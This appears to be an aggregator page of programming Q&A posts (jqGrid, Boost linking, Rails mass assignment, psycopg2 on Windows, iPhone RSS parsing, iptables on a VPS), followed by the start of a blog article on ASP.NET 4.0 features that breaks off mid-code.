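    One more detail on the PHP side: the result column of "select quincytrack_clean()" is named quincytrack_clean, not count, so either fetch $row['quincytrack_clean'] or write "select quincytrack_clean() AS count".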

    Read the article

  • How can i implemente LoadComplete Funtion in Jquery

    - by kumar
    I need to pop up a message for the grid after the grid has been loaded. This is the code I am using to load the grid:

        <script type="text/javascript">
            $(document).ready(function() {
                var RegisterGridEvents = function(excGrid) {
                    //Register column chooser
                    $(excGrid).jqGrid('navButtonAdd', excGrid + '_pager', {
                        caption: "Columns",
                        title: "Reorder Columns",
                        onClickButton: function() {
                            $(excGrid).jqGrid('columnChooser');
                        }
                    });
                    $(".ui-pg-selbox").hide();
                    $('.ui-jqgrid-htable th:first').prepend('Select All').attr('style', 'font-size:7px');
                    //Register grid resize
                    $(excGrid).jqGrid('gridResize', { minWidth: 350, maxWidth: 1500, minHeight: 400, maxHeight: 12000 });
                };
                $('#specialist-tab').tabs("option", "disabled", [2, 3, 4]);
                $('.button').button();
                RegisterButtonEvents();
                RegisterGridEvents("#ExceptionsGrid")
            });
        </script>

    Can anybody help me out: where do I need to write the popup message so it displays after the grid has been loaded? Do I need to use loadComplete or gridComplete in the jQuery grid to do this? If so, where do I need to put that piece of functionality in this? Thanks
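
    loadComplete is the right hook: jqGrid fires it after each load, once the rows have been rendered. It belongs with the grid's options, so either add it where the grid is first configured or attach it from this file, e.g. inside RegisterGridEvents. A sketch:

        $(excGrid).jqGrid('setGridParam', {
            loadComplete: function (data) {
                // Safe place for the popup: the grid has finished loading here.
                alert('Loaded ' + $(excGrid).jqGrid('getGridParam', 'records') + ' rows');
            }
        });

    (gridComplete also exists and fires after the grid body is rebuilt, but for "after the data has been loaded" loadComplete is the conventional choice.)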

    Read the article

  • Boost::Thread linking error on OSX?

    - by gct
    So I'm going nuts trying to figure this one out. Here's my basic setup: I'm compiling a shared library with a bunch of core functionality that uses a lot of boost stuff. We'll call this library libpf_core.so. It's linked with the boost static libraries, specifically the python, system, filesystem, thread, and program_options libraries. This all goes swimmingly. Now, I have a little test program called test_socketio which is compiled into a shared library (it's loaded as a plugin at runtime). It uses some boost stuff like boost::bind and boost::thread, and it's linked against libpf_core.so (which, remember, has the boost libraries included). When I go to compile test_socketio, though, out of all my plugins it gives me a linking error:

        [ Building test_socketio ]
        g++ -c -pg -g -O0 -I/usr/local/include -I../include test_socketio.cc -o test_socketio.o
        g++ -shared test_socketio.o -lpy_core -o test_socketio.so
        Undefined symbols:
          "boost::lock_error::lock_error()", referenced from:
              boost::unique_lock<boost::mutex>::lock() in test_socketio.o
        ld: symbol(s) not found
        collect2: ld returned 1 exit status

    And I'm going crazy trying to figure out why this is. I've tried explicitly linking boost::thread into the plugin to no avail, and tried ensuring that I'm using the boost headers associated with the libraries linked into libpf_core.so in case there was a conflict there. Is there something OSX-specific regarding boost that I'm missing? In my searching on Google I've seen a number of other people get this error, but no one seems to have come up with a satisfactory solution.
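
    One way to narrow it down (a sketch; library names and paths vary by install): ask nm which Boost.Thread binary actually defines the missing constructor, and make sure that exact library is on the plugin's link line, since symbols statically linked into libpf_core.so are not automatically re-exported to plugins on OS X.

        # Does the installed boost_thread define the symbol?
        nm -g /usr/local/lib/libboost_thread*.a | grep lock_error

        # If it does, link it into the plugin explicitly (the library may be
        # named boost_thread-mt on your install):
        g++ -shared test_socketio.o -lpy_core -lboost_thread -o test_socketio.so

    If no installed variant defines it, the headers being used are from a different Boost version than the binaries, and reinstalling Boost so headers and libraries match is the likelier cure.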

    Read the article

  • ActiveModel::MassAssignmentSecurity::Error in CustomersController#create (attr_accessible is set)

    - by megabga
    In my controller, I get an error on the create action when it tries to create the model (can't mass-assign), but in my spec, my test of the model's mass assignment passes!?! My model:

        class Customer < ActiveRecord::Base
          attr_accessible :doc, :doc_rg, :name, :birthday, :name_sec, :address,
                          :state_id, :city_id, :district_id, :customer_pj, :is_customer,
                          :segment_id, :activity_id, :person_type, :person_id

          belongs_to :person, :polymorphic => true, dependent: :destroy
          has_many :histories
          has_many :emails

          def self.search(search)
            if search
              conditions = []
              conditions << ['name LIKE ?', "%#{search}%"]
              find(:all, :conditions => conditions)
            else
              find(:all)
            end
          end
        end

    I've tried setting attr_accessible in the controller too, somewhat at random. The controller:

        class CustomersController < ApplicationController
          include ActiveModel::MassAssignmentSecurity
          attr_accessible :doc, :doc_rg, :name, :birthday, :name_sec, :address,
                          :state_id, :city_id, :district_id, :customer_pj, :is_customer

          autocomplete :business_segment, :name, :full => true
          autocomplete :business_activity, :name, :full => true
          [...]
        end

    The test, my passing test:

        describe "accessible attributes" do
          it "should allow access to basics fields" do
            expect do
              @customer.save
            end.should_not raise_error(ActiveModel::MassAssignmentSecurity::Error)
          end
        end

    The error:

        ActiveModel::MassAssignmentSecurity::Error in CustomersController#create
        Can't mass-assign protected attributes: doc, doc_rg, name_sec, address,
        state_id, city_id, district_id, customer_pj, is_customer

    Environment: Ruby 1.9.2p320, Rails 3.2, Mac OS, pg. Code: https://github.com/megabga/crm

    Read the article

  • Heroku DJango app development on Windows

    - by Cliff
    I'm trying to start a Django app on Heroku using Windows and I'm getting stuck on the following error when I try to pip install psycopg2:

        Downloading/unpacking psycopg2
          Downloading psycopg2-2.4.5.tar.gz (719Kb): 719Kb downloaded
          Running setup.py egg_info for package psycopg2
            Error: pg_config executable not found.
            Please add the directory containing pg_config to the PATH
            or specify the full executable path with the option:
                python setup.py build_ext --pg-config /path/to/pg_config build ...
            or with the pg_config option in 'setup.cfg'.
            Complete output from command python setup.py egg_info:
            running egg_info
            creating pip-egg-info\psycopg2.egg-info
            writing pip-egg-info\psycopg2.egg-info\PKG-INFO
            writing top-level names to pip-egg-info\psycopg2.egg-info\top_level.txt
            writing dependency_links to pip-egg-info\psycopg2.egg-info\dependency_links.txt
            writing manifest file 'pip-egg-info\psycopg2.egg-info\SOURCES.txt'
            warning: manifest_maker: standard file '-c' not found

    I've googled the error and it seems you need libpq-dev and python-dev as dependencies for Postgres under Python. I also turned up a link that says you get into trouble if you don't have the Postgres bin folder in your PATH, so I installed Postgres manually and tried again. This time I get:

        error: Unable to find vcvarsall.bat

    I am still a Python n00b so I am lost. Could someone point me in a general direction?
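
    Two separate problems are stacking here (paths below are examples; adjust to your install). pg_config just needs to be on the PATH, while the vcvarsall.bat error means pip is falling back to compiling C without a matching Visual Studio, which on Windows is usually sidestepped with a prebuilt psycopg2 package:

        :: Put the Postgres tools (pg_config.exe) on the PATH for this shell:
        set PATH=%PATH%;C:\Program Files\PostgreSQL\9.1\bin

        :: Then retry:
        pip install psycopg2

    If the compile still fails on vcvarsall.bat, installing a prebuilt psycopg2 Windows binary instead of building from source avoids the compiler entirely. Heroku itself runs Linux, so psycopg2 in requirements.txt will build fine on push regardless of what the local Windows box can compile.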

    Read the article

  • Syntax errors on Heroku, but not on local server (postgresql related?)

    - by Phil_Ken_Sebben
    I'm trying to deploy my first app on Heroku (Rails 3). It works fine on my local server, but when I pushed it to Heroku and ran it, it crashes, giving a number of syntax errors. These are related to a collection of scopes I use, like the one below:

        scope :scored, lambda { |score = nil|
          score.nil? ? {} : where('products.votes_count >= ?', score)
        }

    It produces errors of this form:

        syntax error, unexpected '=', expecting '|'
        syntax error, unexpected '}', expecting kEND

    Why is this syntax making Heroku choke, and how can I correct it? Thanks!

    EDIT: I was using sqlite on my local machine and Heroku does not support that. Trying to make sure the db is properly configured for PG. I believe I have done that by specifying in the Gemfile that sqlite only be used in development. Yet I still get these syntax errors, which interrupt even the db:migrate.

    EDIT: So now it seems more likely that my scope syntax doesn't work in PostgreSQL. Does anyone know how to convert this properly?
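
    A likely culprit, independent of the database: default values in block parameters, as in |score = nil|, are Ruby 1.9 syntax, and Heroku's stack at the time ran Ruby 1.8.7, whose parser fails with exactly these unexpected '=' / expecting kEND errors. A 1.8-compatible rewrite of the scope:

        scope :scored, lambda { |*args|
          score = args.first
          score.nil? ? {} : where('products.votes_count >= ?', score)
        }

    So PostgreSQL is probably innocent here; the same errors appearing during db:migrate point at the Ruby parser rather than the database layer.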

    Read the article

  • Problems extracting information from RSS feed description field

    - by Graeme
    Hi, I've built an iPhone application using the parsing code from the TopSongs sample iPhone application. I've hit a problem though - the feed I'm trying to parse data from doesn't have a separate field for every piece of information (i.e. if it was for a feed about dogs, all the information such as dog type, dog age and dog price is contained in the feed. However, the TopSongs app relies on information having its own tags, so instead of using it uses and . So my question is this. How do I extract this information from the description field so that it can be parsed using the TopSongs parser? Can you somehow extract the dog age, price and type information using Yahoo Pipes and use that RSS feed for the feed? Or is there code that I can add to do it in application? Update: To view the code of my application parser (based on the TopSongs Core Data Apple provided application, see below. Here's a sample of one item from the the actual RSS feed I'm using (the description is longer, and has status,size, and a couple of other fields, but they're all formatted the same.: <item> <title>MOE, MARGRET STREET</title> <description> <b>District/Region:</b>&nbsp;REGION 09</br><b>Location:</b>&nbsp;MOE</br><b>Name:</b>&nbsp;MARGRET STREET</br></description> <pubDate>Thu,11 Mar 2010 05:43:03 GMT</pubDate> <guid>1266148</guid> </item> /* File: iTunesRSSImporter.m Abstract: Downloads, parses, and imports the iTunes top songs RSS feed into Core Data. Version: 1.1 Disclaimer: IMPORTANT: This Apple software is supplied to you by Apple Inc. ("Apple") in consideration of your agreement to the following terms, and your use, installation, modification or redistribution of this Apple software constitutes acceptance of these terms. If you do not agree with these terms, please do not use, install, modify or redistribute this Apple software. In consideration of your agreement to abide by the following terms, and subject to these terms, Apple grants you a personal, non-exclusive license, under Apple's copyrights in this original Apple software (the "Apple Software"), to use, reproduce, modify and redistribute the Apple Software, with or without modifications, in source and/or binary forms; provided that if you redistribute the Apple Software in its entirety and without modifications, you must retain this notice and the following text and disclaimers in all such redistributions of the Apple Software. Neither the name, trademarks, service marks or logos of Apple Inc. may be used to endorse or promote products derived from the Apple Software without specific prior written permission from Apple. Except as expressly stated in this notice, no other rights or licenses, express or implied, are granted by Apple herein, including but not limited to any patent rights that may be infringed by your derivative works or by other works in which the Apple Software may be incorporated. The Apple Software is provided by Apple on an "AS IS" basis. APPLE MAKES NO WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION THE IMPLIED WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE, REGARDING THE APPLE SOFTWARE OR ITS USE AND OPERATION ALONE OR IN COMBINATION WITH YOUR PRODUCTS. 
IN NO EVENT SHALL APPLE BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) ARISING IN ANY WAY OUT OF THE USE, REPRODUCTION, MODIFICATION AND/OR DISTRIBUTION OF THE APPLE SOFTWARE, HOWEVER CAUSED AND WHETHER UNDER THEORY OF CONTRACT, TORT (INCLUDING NEGLIGENCE), STRICT LIABILITY OR OTHERWISE, EVEN IF APPLE HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Copyright (C) 2009 Apple Inc. All Rights Reserved. */ #import "iTunesRSSImporter.h" #import "Song.h" #import "Category.h" #import "CategoryCache.h" #import <libxml/tree.h> // Function prototypes for SAX callbacks. This sample implements a minimal subset of SAX callbacks. // Depending on your application's needs, you might want to implement more callbacks. static void startElementSAX(void *context, const xmlChar *localname, const xmlChar *prefix, const xmlChar *URI, int nb_namespaces, const xmlChar **namespaces, int nb_attributes, int nb_defaulted, const xmlChar **attributes); static void endElementSAX(void *context, const xmlChar *localname, const xmlChar *prefix, const xmlChar *URI); static void charactersFoundSAX(void *context, const xmlChar *characters, int length); static void errorEncounteredSAX(void *context, const char *errorMessage, ...); // Forward reference. The structure is defined in full at the end of the file. static xmlSAXHandler simpleSAXHandlerStruct; // Class extension for private properties and methods. @interface iTunesRSSImporter () @property BOOL storingCharacters; @property (nonatomic, retain) NSMutableData *characterBuffer; @property BOOL done; @property BOOL parsingASong; @property NSUInteger countForCurrentBatch; @property (nonatomic, retain) Song *currentSong; @property (nonatomic, retain) NSURLConnection *rssConnection; @property (nonatomic, retain) NSDateFormatter *dateFormatter; // The autorelease pool property is assign because autorelease pools cannot be retained. 
@property (nonatomic, assign) NSAutoreleasePool *importPool; @end static double lookuptime = 0; @implementation iTunesRSSImporter @synthesize iTunesURL, delegate, persistentStoreCoordinator; @synthesize rssConnection, done, parsingASong, storingCharacters, currentSong, countForCurrentBatch, characterBuffer, dateFormatter, importPool; - (void)dealloc { [iTunesURL release]; [characterBuffer release]; [currentSong release]; [rssConnection release]; [dateFormatter release]; [persistentStoreCoordinator release]; [insertionContext release]; [songEntityDescription release]; [theCache release]; [super dealloc]; } - (void)main { self.importPool = [[NSAutoreleasePool alloc] init]; if (delegate && [delegate respondsToSelector:@selector(importerDidSave:)]) { [[NSNotificationCenter defaultCenter] addObserver:delegate selector:@selector(importerDidSave:) name:NSManagedObjectContextDidSaveNotification object:self.insertionContext]; } done = NO; self.dateFormatter = [[[NSDateFormatter alloc] init] autorelease]; [dateFormatter setDateStyle:NSDateFormatterLongStyle]; [dateFormatter setTimeStyle:NSDateFormatterNoStyle]; // necessary because iTunes RSS feed is not localized, so if the device region has been set to other than US // the date formatter must be set to US locale in order to parse the dates [dateFormatter setLocale:[[[NSLocale alloc] initWithLocaleIdentifier:@"US"] autorelease]]; self.characterBuffer = [NSMutableData data]; NSURLRequest *theRequest = [NSURLRequest requestWithURL:iTunesURL]; // create the connection with the request and start loading the data rssConnection = [[NSURLConnection alloc] initWithRequest:theRequest delegate:self]; // This creates a context for "push" parsing in which chunks of data that are not "well balanced" can be passed // to the context for streaming parsing. The handler structure defined above will be used for all the parsing. // The second argument, self, will be passed as user data to each of the SAX handlers. The last three arguments // are left blank to avoid creating a tree in memory. context = xmlCreatePushParserCtxt(&simpleSAXHandlerStruct, self, NULL, 0, NULL); if (rssConnection != nil) { do { [[NSRunLoop currentRunLoop] runMode:NSDefaultRunLoopMode beforeDate:[NSDate distantFuture]]; } while (!done); } // Display the total time spent finding a specific object for a relationship NSLog(@"lookup time %f", lookuptime); // Release resources used only in this thread. 
xmlFreeParserCtxt(context); self.characterBuffer = nil; self.dateFormatter = nil; self.rssConnection = nil; self.currentSong = nil; [theCache release]; theCache = nil; NSError *saveError = nil; NSAssert1([insertionContext save:&saveError], @"Unhandled error saving managed object context in import thread: %@", [saveError localizedDescription]); if (delegate && [delegate respondsToSelector:@selector(importerDidSave:)]) { [[NSNotificationCenter defaultCenter] removeObserver:delegate name:NSManagedObjectContextDidSaveNotification object:self.insertionContext]; } if (self.delegate != nil && [self.delegate respondsToSelector:@selector(importerDidFinishParsingData:)]) { [self.delegate importerDidFinishParsingData:self]; } [importPool release]; self.importPool = nil; } - (NSManagedObjectContext *)insertionContext { if (insertionContext == nil) { insertionContext = [[NSManagedObjectContext alloc] init]; [insertionContext setPersistentStoreCoordinator:self.persistentStoreCoordinator]; } return insertionContext; } - (void)forwardError:(NSError *)error { if (self.delegate != nil && [self.delegate respondsToSelector:@selector(importer:didFailWithError:)]) { [self.delegate importer:self didFailWithError:error]; } } - (NSEntityDescription *)songEntityDescription { if (songEntityDescription == nil) { songEntityDescription = [[NSEntityDescription entityForName:@"Song" inManagedObjectContext:self.insertionContext] retain]; } return songEntityDescription; } - (CategoryCache *)theCache { if (theCache == nil) { theCache = [[CategoryCache alloc] init]; theCache.managedObjectContext = self.insertionContext; } return theCache; } - (Song *)currentSong { if (currentSong == nil) { currentSong = [[Song alloc] initWithEntity:self.songEntityDescription insertIntoManagedObjectContext:self.insertionContext]; } return currentSong; } #pragma mark NSURLConnection Delegate methods // Forward errors to the delegate. - (void)connection:(NSURLConnection *)connection didFailWithError:(NSError *)error { [self performSelectorOnMainThread:@selector(forwardError:) withObject:error waitUntilDone:NO]; // Set the condition which ends the run loop. done = YES; } // Called when a chunk of data has been downloaded. - (void)connection:(NSURLConnection *)connection didReceiveData:(NSData *)data { // Process the downloaded chunk of data. xmlParseChunk(context, (const char *)[data bytes], [data length], 0); } - (void)connectionDidFinishLoading:(NSURLConnection *)connection { // Signal the context that parsing is complete by passing "1" as the last parameter. xmlParseChunk(context, NULL, 0, 1); context = NULL; // Set the condition which ends the run loop. done = YES; } #pragma mark Parsing support methods static const NSUInteger kImportBatchSize = 20; - (void)finishedCurrentSong { parsingASong = NO; self.currentSong = nil; countForCurrentBatch++; // Periodically purge the autorelease pool and save the context. The frequency of this action may need to be tuned according to the // size of the objects being parsed. The goal is to keep the autorelease pool from growing too large, but // taking this action too frequently would be wasteful and reduce performance. 
if (countForCurrentBatch == kImportBatchSize) { [importPool release]; self.importPool = [[NSAutoreleasePool alloc] init]; NSError *saveError = nil; NSAssert1([insertionContext save:&saveError], @"Unhandled error saving managed object context in import thread: %@", [saveError localizedDescription]); countForCurrentBatch = 0; } } /* Character data is appended to a buffer until the current element ends. */ - (void)appendCharacters:(const char *)charactersFound length:(NSInteger)length { [characterBuffer appendBytes:charactersFound length:length]; } - (NSString *)currentString { // Create a string with the character data using UTF-8 encoding. UTF-8 is the default XML data encoding. NSString *currentString = [[[NSString alloc] initWithData:characterBuffer encoding:NSUTF8StringEncoding] autorelease]; [characterBuffer setLength:0]; return currentString; } @end #pragma mark SAX Parsing Callbacks // The following constants are the XML element names and their string lengths for parsing comparison. // The lengths include the null terminator, to ensure exact matches. static const char *kName_Item = "item"; static const NSUInteger kLength_Item = 5; static const char *kName_Title = "title"; static const NSUInteger kLength_Title = 6; static const char *kName_Category = "category"; static const NSUInteger kLength_Category = 9; static const char *kName_Itms = "itms"; static const NSUInteger kLength_Itms = 5; static const char *kName_Artist = "description"; static const NSUInteger kLength_Artist = 7; static const char *kName_Album = "description"; static const NSUInteger kLength_Album = 6; static const char *kName_ReleaseDate = "releasedate"; static const NSUInteger kLength_ReleaseDate = 12; /* This callback is invoked when the importer finds the beginning of a node in the XML. For this application, out parsing needs are relatively modest - we need only match the node name. An "item" node is a record of data about a song. In that case we create a new Song object. The other nodes of interest are several of the child nodes of the Song currently being parsed. For those nodes we want to accumulate the character data in a buffer. Some of the child nodes use a namespace prefix. */ static void startElementSAX(void *parsingContext, const xmlChar *localname, const xmlChar *prefix, const xmlChar *URI, int nb_namespaces, const xmlChar **namespaces, int nb_attributes, int nb_defaulted, const xmlChar **attributes) { iTunesRSSImporter *importer = (iTunesRSSImporter *)parsingContext; // The second parameter to strncmp is the name of the element, which we known from the XML schema of the feed. // The third parameter to strncmp is the number of characters in the element name, plus 1 for the null terminator. if (prefix == NULL && !strncmp((const char *)localname, kName_Item, kLength_Item)) { importer.parsingASong = YES; } else if (importer.parsingASong && ( (prefix == NULL && (!strncmp((const char *)localname, kName_Title, kLength_Title) || !strncmp((const char *)localname, kName_Category, kLength_Category))) || ((prefix != NULL && !strncmp((const char *)prefix, kName_Itms, kLength_Itms)) && (!strncmp((const char *)localname, kName_Artist, kLength_Artist) || !strncmp((const char *)localname, kName_Album, kLength_Album) || !strncmp((const char *)localname, kName_ReleaseDate, kLength_ReleaseDate))) )) { importer.storingCharacters = YES; } } /* This callback is invoked when the parse reaches the end of a node. At that point we finish processing that node, if it is of interest to us. 
For "item" nodes, that means we have completed parsing a Song object. We pass the song to a method in the superclass which will eventually deliver it to the delegate. For the other nodes we care about, this means we have all the character data. The next step is to create an NSString using the buffer contents and store that with the current Song object. */ static void endElementSAX(void *parsingContext, const xmlChar *localname, const xmlChar *prefix, const xmlChar *URI) { iTunesRSSImporter *importer = (iTunesRSSImporter *)parsingContext; if (importer.parsingASong == NO) return; if (prefix == NULL) { if (!strncmp((const char *)localname, kName_Item, kLength_Item)) { [importer finishedCurrentSong]; } else if (!strncmp((const char *)localname, kName_Title, kLength_Title)) { importer.currentSong.title = importer.currentString; } else if (!strncmp((const char *)localname, kName_Category, kLength_Category)) { double before = [NSDate timeIntervalSinceReferenceDate]; Category *category = [importer.theCache categoryWithName:importer.currentString]; double delta = [NSDate timeIntervalSinceReferenceDate] - before; lookuptime += delta; importer.currentSong.category = category; } } else if (!strncmp((const char *)prefix, kName_Itms, kLength_Itms)) { if (!strncmp((const char *)localname, kName_Artist, kLength_Artist)) { NSString *string = importer.currentSong.artist; NSArray *strings = [string componentsSeparatedByString: @", "]; //importer.currentSong.artist = importer.currentString; } else if (!strncmp((const char *)localname, kName_Album, kLength_Album)) { importer.currentSong.album = importer.currentString; } else if (!strncmp((const char *)localname, kName_ReleaseDate, kLength_ReleaseDate)) { NSString *dateString = importer.currentString; importer.currentSong.releaseDate = [importer.dateFormatter dateFromString:dateString]; } } importer.storingCharacters = NO; } /* This callback is invoked when the parser encounters character data inside a node. The importer class determines how to use the character data. */ static void charactersFoundSAX(void *parsingContext, const xmlChar *characterArray, int numberOfCharacters) { iTunesRSSImporter *importer = (iTunesRSSImporter *)parsingContext; // A state variable, "storingCharacters", is set when nodes of interest begin and end. // This determines whether character data is handled or ignored. if (importer.storingCharacters == NO) return; [importer appendCharacters:(const char *)characterArray length:numberOfCharacters]; } /* A production application should include robust error handling as part of its parsing implementation. The specifics of how errors are handled depends on the application. */ static void errorEncounteredSAX(void *parsingContext, const char *errorMessage, ...) { // Handle errors as appropriate for your application. NSCAssert(NO, @"Unhandled error encountered during SAX parse."); } // The handler struct has positions for a large number of callback functions. If NULL is supplied at a given position, // that callback functionality won't be used. Refer to libxml documentation at http://www.xmlsoft.org for more information // about the SAX callbacks. 
static xmlSAXHandler simpleSAXHandlerStruct = { NULL, /* internalSubset */ NULL, /* isStandalone */ NULL, /* hasInternalSubset */ NULL, /* hasExternalSubset */ NULL, /* resolveEntity */ NULL, /* getEntity */ NULL, /* entityDecl */ NULL, /* notationDecl */ NULL, /* attributeDecl */ NULL, /* elementDecl */ NULL, /* unparsedEntityDecl */ NULL, /* setDocumentLocator */ NULL, /* startDocument */ NULL, /* endDocument */ NULL, /* startElement*/ NULL, /* endElement */ NULL, /* reference */ charactersFoundSAX, /* characters */ NULL, /* ignorableWhitespace */ NULL, /* processingInstruction */ NULL, /* comment */ NULL, /* warning */ errorEncounteredSAX, /* error */ NULL, /* fatalError //: unused error() get all the errors */ NULL, /* getParameterEntity */ NULL, /* cdataBlock */ NULL, /* externalSubset */ XML_SAX2_MAGIC, // NULL, startElementSAX, /* startElementNs */ endElementSAX, /* endElementNs */ NULL, /* serror */ }; Thanks.

    Read the article

  • DSL Modem with Wireless Router

    - by David
    I have a D-Link WBR-1310 wireless router and a TP-Link TD-8616 DSL modem. My old DSL modem died recently and I got the TP-Link as a replacement. With my old DSL modem, I plugged it into the WAN port on my D-Link and I could reach the internet through wireless and through the network. However, when I plugged the new TP-Link into the WAN port, I was not able to get any internet connectivity (either on the network ports or through wireless). So I plugged my laptop directly into the TP-Link DSL modem and I was able to get internet connectivity. I'm trying to figure out why my laptop can see the internet connection, but not the D-Link router. I think that the problem is due to the IP networking. My D-Link was originally set to have IP address 192.168.1.1. According to the documentation for the TP-Link DSL modem, it uses 192.168.1.1 as its IP address. I do not believe that my old DSL modem had an IP address. I logged into my D-Link router and changed its IP address to 192.168.1.2 and restarted it. Unfortunately, I still could not see the internet from my wireless devices. I've read a few forum postings which implied that I needed to setup a "bridge" between the two networks. Does that sound correct? Why didn't my old DSL modem require a bridge? I read pg. 12-13 of my D-Link's manual and they suggest that I need to disable UPnP, DHCP, and then plug the DSL modem into one of the LAN ports on my router. I'm concerned about doing this since I don't think that the firewall will work if I plug my DSL modem into one of the LAN ports. I also have a home NAS on my network and I wouldn't want that to be available over the internet. Does anyone have any advice about how I can get my TP-Link DSL modem to work with my D-Link router? Thanks!

    Read the article

  • Managing hosts and iptables in scalable architecture

    - by hakunin
    Let's say I have a load balancer in front of 3 app servers. Let's say I also have these services available at certain IPs:

        - Postgres server
        - Redis server
        - ElasticSearch server
        - Memcached server 1
        - Memcached server 2
        - Memcached server 3

    So that's 6 nodes at 6 different IP addresses. Naturally, every one of my 3 app servers needs to talk to these 6 servers above. Then, to make it a bit funkier, I also have 3 worker servers. And each worker also talks to the above 6 servers, but thankfully workers and apps never need to talk to each other. Now's the kicker. Everything is on Digital Ocean VPS. What that means is: you have no private network, no private IPs. You only have a separate, random IP address on each machine. You can't mask them or anything. So in order to build a secure environment I would have to configure some iptables. For example:

        - Open the app servers to be accessed by the load balancer server
        - Open the Redis, ES, PG, and each memcached server to be accessed by each app's IP and each worker's IP

    This means that every time I add an app or worker I also have to reconfigure iptables on those above 6 servers to welcome the new app or worker (a sketch of what each node carries follows below). Is there a way to simplify this type of setup? I was thinking: what if there were a gateway machine between the apps/workers and the above 6 machines? This way all the interaction would always happen via the gateway server, and when I add a new app or worker I wouldn't need to teach the 6 servers to let it in. If I went this route, then I'd hope a small 512MB server could perhaps handle that, and there wouldn't be almost any overhead. Or would there? Please help with the best way to handle this situation. I would appreciate an answer as concrete as possible. I don't think this is too specific, because this general architecture is very common, and Digital Ocean is becoming increasingly popular. A concrete solution here would be much appreciated by many.
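
    For scale, this is what each of the six service boxes ends up carrying (a sketch; documentation addresses stand in for the real app and worker IPs), and it is exactly the per-node bookkeeping that grows with every app or worker added:

        # e.g. on the Postgres box: allow each app and worker, drop everyone else
        iptables -A INPUT -p tcp --dport 5432 -s 203.0.113.11 -j ACCEPT   # app 1
        iptables -A INPUT -p tcp --dport 5432 -s 203.0.113.12 -j ACCEPT   # app 2
        iptables -A INPUT -p tcp --dport 5432 -s 203.0.113.21 -j ACCEPT   # worker 1
        iptables -A INPUT -p tcp --dport 5432 -j DROP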

    Read the article

  • What’s new in ASP.NET 4.0: Core Features

    - by Rick Strahl
    Microsoft released the .NET Runtime 4.0 and with it comes a brand spanking new version of ASP.NET – version 4.0 – which provides an incremental set of improvements to an already powerful platform. .NET 4.0 is a full release of the .NET Framework, unlike version 3.5, which was merely a set of library updates on top of the .NET Framework version 2.0. Because of this full framework revision, there has been a welcome bit of consolidation of assemblies and configuration settings. The full runtime version change to 4.0 also means that you have to explicitly pick version 4.0 of the runtime when you create a new Application Pool in IIS, unlike .NET 3.5, which actually requires version 2.0 of the runtime. In this first of two parts I'll take a look at some of the changes in the core ASP.NET runtime. In the next edition I'll go over improvements in Web Forms and Visual Studio. Core Engine Features Most of the high profile improvements in ASP.NET have to do with Web Forms, but there are a few gems in the core runtime that should make life easier for ASP.NET developers. The following list describes some of the things I've found useful among the new features. Clean web.config Files Are Back! If you've been using ASP.NET 3.5, you probably have noticed that the web.config file has turned into quite a mess of configuration settings between all the custom handler and module mappings for the various web server versions. Part of the reason for this mess is that .NET 3.5 is a collection of add-on components running on top of the .NET Runtime 2.0 and so almost all of the new features of .NET 3.5 where essentially introduced as custom modules and handlers that had to be explicitly configured in the config file. Because the core runtime didn't rev with 3.5, all those configuration options couldn't be moved up to other configuration files in the system chain. With version 4.0 a consolidation was possible, and the result is a much simpler web.config file by default. A default empty ASP.NET 4.0 Web Forms project looks like this: <?xml version="1.0"?> <configuration> <system.web> <compilation debug="true" targetFramework="4.0" /> </system.web> </configuration> Need I say more? Configuration Transformation Files to Manage Configurations and Application Packaging ASP.NET 4.0 introduces the ability to create multi-target configuration files. This means it's possible to create a single configuration file that can be transformed based on relatively simple replacement rules using a Visual Studio and WebDeploy provided XSLT syntax. The idea is that you can create a 'master' configuration file and then create customized versions of this master configuration file by applying some relatively simplistic search and replace, add or remove logic to specific elements and attributes in the original file. 
    To give you an idea, here's the example code that Visual Studio creates for a default web.Release.config file, which replaces a connection string, removes the debug attribute, and replaces the customErrors section:

        <?xml version="1.0"?>
        <configuration xmlns:xdt="http://schemas.microsoft.com/XML-Document-Transform">
          <connectionStrings>
            <add name="MyDB"
                 connectionString="Data Source=ReleaseSQLServer;Initial Catalog=MyReleaseDB;Integrated Security=True"
                 xdt:Transform="SetAttributes" xdt:Locator="Match(name)"/>
          </connectionStrings>
          <system.web>
            <compilation xdt:Transform="RemoveAttributes(debug)" />
            <customErrors defaultRedirect="GenericError.htm" mode="RemoteOnly" xdt:Transform="Replace">
              <error statusCode="500" redirect="InternalError.htm"/>
            </customErrors>
          </system.web>
        </configuration>

    You can see the XDT transform syntax that drives this functionality. Basically, only the elements listed in the override file are matched and updated – all the rest of the original web.config file stays intact. Visual Studio 2010 supports this functionality directly in the project system, so it's easy to create and maintain these customized configurations in the project tree. Once you're ready to publish your application, you can use the Publish <yourWebApplication> option on the Build menu, which allows publishing to disk, via FTP, or to a Web Server using Web Deploy. You can also create a deployment package as a .zip file which can be used by the WebDeploy tool to configure and install the application. You can manually run the Web Deploy tool or use the IIS Manager to install the package on the server or another machine. You can find out more about WebDeploy and packaging here: http://tinyurl.com/2anxcje.

    Improved Routing

    Routing provides a relatively simple way to create clean URLs with ASP.NET by associating a template URL path and routing it to a specific ASP.NET HttpHandler. Microsoft first introduced routing with ASP.NET MVC and then integrated it into the core ASP.NET engine with a basic implementation in a separate ASP.NET routing assembly. In ASP.NET 4.0, using the routing functionality gets a bit easier. First, routing is now rolled directly into System.Web, so no extra assembly reference is required in your projects. The RouteCollection class now includes a MapPageRoute() method that makes it easy to route any ASP.NET Page request without first having to implement IRouteHandler. It would have been nice if this could have been extended to serve *any* handler implementation, but unfortunately for anything other than Page-derived handlers you will still have to implement a custom IRouteHandler. ASP.NET Pages now include a RouteData collection that contains route information. Retrieving route data is now a lot easier: simply use this.RouteData.Values["routeKey"], where routeKey is the value specified in the route template (i.e., "users/{userId}" would use Values["userId"]).
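    To tie these pieces together, here's a minimal sketch showing a route registered in Application_Start via MapPageRoute() and the route value read back in the target page. The route name, URL template, and page names are hypothetical:

        using System;
        using System.Web.Routing;

        public class Global : System.Web.HttpApplication
        {
            protected void Application_Start(object sender, EventArgs e)
            {
                // "users/{userId}" requests are served by UserDetail.aspx;
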